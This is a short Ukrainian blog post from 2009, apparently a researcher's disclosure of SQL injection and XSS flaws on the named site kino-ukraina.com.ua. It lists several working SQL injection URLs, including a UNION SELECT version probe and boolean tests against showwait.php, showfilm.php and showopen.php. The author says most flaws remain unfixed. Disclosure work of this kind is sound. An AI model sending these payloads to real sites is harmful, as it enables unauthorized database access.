Уразливості на www.kino-ukraina.com.ua
19:22 04.08.200907.05.2009
У серпні, 19.08.2008, я знайшов SQL Injection уразливість, а сьогодні ще нові SQL Injection та Cross-Site Scripting уразливості на сайті http://www.kino-ukraina.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.
Раніше я вже писав про уразливості на kino-ukraina.com.ua.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
04.08.2009
SQL Injection:
http://www.kino-ukraina.com.ua/?id=-1%27%20or%201=1/*
Вже виправлена в результаті змін на сайті.
http://www.kino-ukraina.com.ua/showwait.php?wait_id=84%20and%20version()=5
http://www.kino-ukraina.com.ua/showwait.php?wait_id=-1%20union%20select%200,0,version(),0%23
http://www.kino-ukraina.com.ua/showfilm.php?film_id=88%20and%20version()=5
http://www.kino-ukraina.com.ua/showopen.php?opening_id=53%20and%20version()=5
XSS:
Більшість з уразливостей так досі й не виправлені.